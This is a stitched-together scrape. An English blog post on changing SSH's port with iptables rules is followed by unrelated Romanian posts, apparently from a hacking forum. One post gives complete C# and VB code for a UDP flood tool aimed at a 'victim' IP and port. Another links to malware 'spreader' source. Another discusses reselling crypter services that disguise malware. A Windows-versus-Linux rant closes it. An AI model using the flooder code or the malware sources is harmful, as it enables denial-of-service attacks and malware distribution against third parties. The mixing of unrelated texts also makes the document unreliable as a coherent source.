For years, on security forums and mailing lists, if you ever dared to suggest changing SSH’s default port (TCP 22) the “security by obscurity” crowd would come out of the woodwork and nail your ass to the Cross of Righteousness for having the unmitigated gall to even dare utter such heretical nonsense. Unfortunately for these dogmatic True Believers, changing the ssh daemon’s default listening port is such an incredibly effective method for avoiding ssh scans and brute force password attacks that it’s starting to show up in HOWTO security articles as a method for hardening your system. For example, see this article at Linux Magazine. Five Easy Ways to Secure Your Linux System | Linux Magazine But the Port 22 Crowd will not leave well enough alone. Although they haven’t abandoned the “security by obscurity” mantra completely, they’re now using the following argument with increasing frequency: NEVER CHANGE YOUR SSH PORT! If an exploit comes out that can crash SSH locally, a local unprivileged user on your system could crash SSH and start their own daemon on the SSH port > 1024 and capture your usernames and passwords. If you want SSH on a different port, do this with firewall rules. Note that ALL CAPS is required when raising this alarm. Also note that if you require users to connect with SSH in the first place, it’s not going to do them a helluva lot of good to crash SSH. If you have users who actually sit down at the keyboard of the physical system, that’s another problem entirely. Why bother with crashing SSH when they can slip a bootable CD into the tray and bounce the box? And of course if you choose a port other than 22 but less than 1024 you can avoid this issue completely. However, “changing the port with firewall rules” struck me as a novel idea (maybe I’m just stupid but it never occurred to me before) and set me to wondering how you would do such a thing, since I’ve always taking the easy way out by changing or adding ports in sshd_config. So I sat down with iptables and experimented a bit. I came up with the following method. If everything you have is behind NAT, the problem can be reduced to simple port forwarding. If not, there are a few hoops you need to jump through. Be advised the iptables rules presented below assume you have a blank set of rules. Just copying and running them against an existing set of rules probably won’t work. First, set SSHD back to the default port 22. Next, figure out what port or ports you want to do SSH over. We’re going to use 99, 88, and 8888 here. Now we take care of the Hypothetical Evil Unprivileged User by not accepting anything over those ports in the first place. This is only effective for port 8888 but we’ll do all three ports for the sake of completeness: iptables -t filter -A INPUT -p tcp -m multiport –dports 99,88,8888 -j REJECT –reject-with tcp-reset Then, pick a number between 1 and 4294967295. This will be the value of the iptables “mark” we use for ssh. I’ll use 0×29A (666), just because it’s my lucky number, but any positive integer in that range will do. We’re going to tell iptables to reject anything without this mark coming into port 22. iptables -t filter -A INPUT -p tcp -m tcp –dport 22 -m connmark ! –mark 0×29A -j REJECT –reject-with tcp-reset I would prefer to DROP these packets rather than REJECT them, but more on that later. Now we’ll tell iptables what ports we will accept for ssh. iptables -t filter -A FORWARD -p tcp -m multiport –dports 99,88,8888 -j ACCEPT In the “mangle” table we slap our mark on these packets. iptables -t mangle -A PREROUTING -p tcp -m multiport –dports 99,88,8888 -j CONNMARK –set-mark 0×29A Finally, in the “nat” table we tell iptables to send the marked packets back to port 22. #~ iptables -t nat -A PREROUTING -p tcp -m multiport –dports 99,88,8888 -j REDIRECT –to-ports 22 The packets go back to the INPUT rule and, since they’re marked correctly, are sent to the SSHD process listening on port 22. We have done exactly what was recommended, i.e. we have indeed changed the default ssh port with firewall rules alone (and without NAT). And yet, ssh still listens on port 22! I must admit this appeals to me on a number of levels, not the least of which is that it has all the hallmarks of a slick little hack. Secondly, it definitely takes a load off of the ssh daemon since it’s listening on one port instead of three (in reality I have ssh listening on seven ports). However, this is done at the expense of complexity, which has yet another group of True Believers who are fond of chanting “COMPLEXITY IS THE ENEMY OF SECURITY” at the slightest provocation. This is another religion I have never bought into (it may be the same group since increasing complexity generally tends to increase obscurity). Well, fuck them, you can’t please everyone. Besides, I use the most bizarre, complex combination of port forwarding and routing you’d ever want to see. Most days I have a hard time understanding it myself. It keeps me sharp. I am almost 100% certain this wouldn’t please a “real” firewall administrator. They’re mostly overpaid Certified Cisco Clowns anyway. It would never even occur to them to actually use iptables. But what we have done in essence is put all our trust in iptables working “just right”. And we’re betting the next time there’s an update to the netfilter core code (or the kernel) everything will still work. I’ve been around iptables/netfilter far too long to ever bet on that. Sorry, fellas, “once bitten, twice shy” and all that. Then there’s the TCP reset thing. Can it be bypassed? Web filtering appliances that use span ports and two-way TCP resets work fine when everyone “plays by the rules of TCP/IP” (actual statement from Web filter appliance vendor Sophos), but the Bad Guys don’t usually play by the rules. The alternative, DROP-ing the packet, lets anyone scanning our system with tools like nmap know with absolute certainty that SSHD is listening on port 22 since it will show up as “filtered”. This makes TCP resets the lesser of two evils, but it’s still evil. In the end analysis, isn’t sending a reset from an “open” port just another instance of “security by obscurity”? Not that I care, that was a purely rhetorical question. And what about attacks against iptables connection marking (CONNMARK) itself? Do they even exist? Am I opening myself up to an unknown exploit vector? Do I have to take additional measures to avoid spoofing or brute forcing or some other method (fragmented/crafted packets, maybe) to get around my firewall rules? Even though we followed this fellow’s advice, there are too many open questions and it appears that just changing the port in sshd_config is still a simple and effective countermeasure. It’s worked for me for over ten years. I have escaped all 0day SSHD vulnerabilities for over a decade and no one ever tries to brute force passwords on my box. It doesn’t happen because port 22 isn’t open. Simple. Effective.

Eu sper ca yahoo si live.com sa ia atitudine si sa nu le mai dea voie la IM, dai dreq ce ei nu au deja?

Sigur aia e parola? Edit: sunt eu mai prost astazi....

Daca nu ma uitam la cat de vechimea topicului, nu realizam prostia... C#: int i = 0; public static string IP; public static int Port; private void Bg_DoWork(System.Object sender, System.ComponentModel.DoWorkEventArgs e) { IPAddress IpVictima = IPAddress.Parse(IP); IPEndPoint Victima = new IPEndPoint(IpVictima, Port); byte[] packet = new byte[1470]; Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp); while (true) { if (Bg.CancellationPending == true) { return; } try { socket.SendTo(packet, Victima); i += 1; } catch (Exception ex) { Bg.CancelAsync(); } } } Folosire: Bg.RunWorkerAsync();, respectiv Bg.CancelAsync(); VB: Dim i As Integer = 0 Public Shared IP As String Public Shared Port As Integer Private Sub Bg_DoWork(ByVal sender As System.Object, ByVal e As System.ComponentModel.DoWorkEventArgs) Handles Bg2.DoWork Dim IpVictima As IPAddress = IPAddress.Parse(IP) Dim Victima As New IPEndPoint(IpVictima, Port) Dim packet As Byte() = New Byte(1469) {} Dim socket As New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp) While True If Bg.CancellationPending = True Then Exit Sub End If Try socket.SendTo(packet, Victima) i += 1 Catch ex As Exception Bg.CancelAsync() End Try End While End Sub Folosire: Bg.RunWorkerAsync(), respectiv Bg.CancelAsync() Cat de greu e sa va faceti si voi unul?

Se vede ca esti Din Jungla

Voi stiti windows cum stiti si linux sau mamaimea diablo 3. Vista WPF, dupa parerea mea va ramane cel mai stabil OS pentru WPF...desigur habar nu aveti ce e ala. Vienna, desigur din cauza multor asa zise erori, toate din vina programatorilor care au ramas la XP CLR nu au sezisat puterea WPF...atunci au scos un OS sa multumeasca si oamenii de rand...gen voi + silverlight. Win8 Metro style, Async,...normal ca habar nu aveti ce inseamna asta..daca va intreb cam in jurul a carei cifre se afla noile functii din noul kernel...binenteles ca nu stiti sa raspundeti, dar daca o fac pe platforma linux e cam la fel nu stiu ce sa zic...asta pentru ca nu ati aruncat o privire la microsoft in acest caz...channel9, msdn, blogs. Visual Studio10+=WPF, asta sa va faceti o idee. Unii zic ca Xp intodeauna va fi si va ramane..ei bine au dreptate, dar doar din 2 puncte de vedere...si anume cel al programarii, si al hardware-ului.Windows 8 e facut incat sa-ti mearga pe aproape orice pc, insa windows 8 e structurat in asa fel incat orice program adaugat iti mareste eficienta sistemului de operare...ceva nou, pana acum auzeai de programe care iti incarca OS-sul...iar majoritatea fac ce gasesti si in utilitarele de la microsoft...insa acum acest lucru se schimba, dar asta nu inseamna ca cerintele nu vor creste pe parcursul instalarii rahaturilor. Un sfat pentru cei cu VM..win 8 cere cel putin 512 mb memorie in plus cand e vorba de VM...deci e posibil si de asta sa nu va mearga...in aceasta versiune este o problema cu driverele...in general cam 90% din cele care merg pe win7 merg si pe 8 iar daca nu va merg..instalati-le manual, acelasi lucru si cu cele pentru XP. Sunt multe de vorbit despre win8, ei bine nu stiu cat de interesant o sa vi se para...dar e un OS destul de ok zic eu. Welcome Async, Metro Style.><

https://rstcenter.com/forum/47292-poze-cu-carcasa-p-4.rst#post314826

Ma, voi sunteti tare aiuriti....sincer eu m-am contrazis cu bunnn, nu stiu daca iti mai aduci aminte...sincer nu-mi place acel crypter, prefer sa-mi fac unul daca chiar simt nevoie sa am asa ceva, DAR nu iti faci frate asemenea serviciu de crypt cu open source fara sa pui sursa, sau mai bine zis nu faci asemenea serviciu din munca altora si mai ales publica, sa mai si scoti bani din asta.Fa-ti frate unul al tau, stai de update ca sa stii ca vei avea clienti, si vinde-ti serviciile. Numai zic nimic ca website-ul e varza asa cum a descoperit si B3st, voi ori sunteti invidiosi ca nu sunteti capabili sa faceti un amarat de crypter pentru bunul plac ori sunteti orbi. Dupa parerea mea, sunt niste slabi...habar nu au, sincer daca Bunn ar afla ca eu vand serviciile lui gen link-ul de mai sus, ar iesi nasol din mai multe puncte de vedere...nu credeti? Fara ofense.

AutoSpreader Source: http://www.opensc.ws/attachments/malware-samples-information/5391d1310954922-dev-point-spreader-v2-0-dev-point_spreader_v2.0-source-code.rar Spreaderul pulii B3st: nu cred ca sunt acceptate, oricum am scapat Cola pe tastatura:))

Defapt eu cred ca daca Microsoft nu o sa mai fie "user friendly" o sa dispara linux, problema e ca pyth0n3 a avut dreptate si trebuie gandita.Daca vreodata vei pune o intrebare de gen pe rst va castiga Linux...pentru ca e "blasfemie" sa nu castige...e psihologic, un gandac cu 150 de posturi sa zica Muie Microsoft fara sa se gandeasca la prea multe ....cum ar fi libera exprimare(sau ce e windows ce mananci cu el, sau Linux-proprie definitie), sincer sa fiu un limbaj de programare cum ar fi ASM sau c/c++ intodeauna va fi la fel, iar daca le cunosti cat de cat te doare in pula de ce sistem de operare folosesti. Eu cred ca raspunsul la titlul topicului e mai degraba ...Ma doare'n pula ma descurc cu oricare...programarea e peste tot acelasi rahat, administrarea la fel, foarte putin diferite datorita OS-ului. Cat despre gaming..ei bine atat cat microsoft nu vine nici cea mai mica parte din DirectX catre linux/mac e si normal sa detina monopolul. SI da au fost multe, am si asistat la cateva discutii Linux Vs Windows, dar sincer mi se pare un rahat, nonsens, am ajuns la concluzia ca poti face cam orice pe linux, poti chiar rula unele aplicatii de win,.net, etc, dar la fel si pe windows poti rula aplicatii de linux, si face foarte multe altele,eu sincer sa fiu am folosit de vreo 2 ori wine, si mi se pare un cacat faptul ca atatea persoane la About, care nu au fost capabile sa ruleze niste drivere, sau fisiere de sistem, in rest e totul bine imi place, dar NU. Daca cumva vreodata te crezi programator sa nu raspunzi cu Linux...sau windows ,un programator cu vreo 10-15 ani experienta asimileaza o noua limba de programare in maxim 1 luna, fara sa ii pese prea mult de OS. SI imi sustin parerea, cum un user normal de rand daca ii zici tot romanul rst despre Linux si ce face...credema ca raspunde..ori "Are cantar?..."Are facebook?"...si daca le zici da..."nu frate, lasa windows...ca..." care le are si linux...? Prea putin o sa-i pese unui user nou care deja are imprimat un OS in cap de altul. Un Sistem de operare e bine sa il ai in cap, si mai ales ce face fiecare, dar fiecare poate face orice deci concluzia mea, Nu conteaza OS-ul, conteaza persoana din monitorului.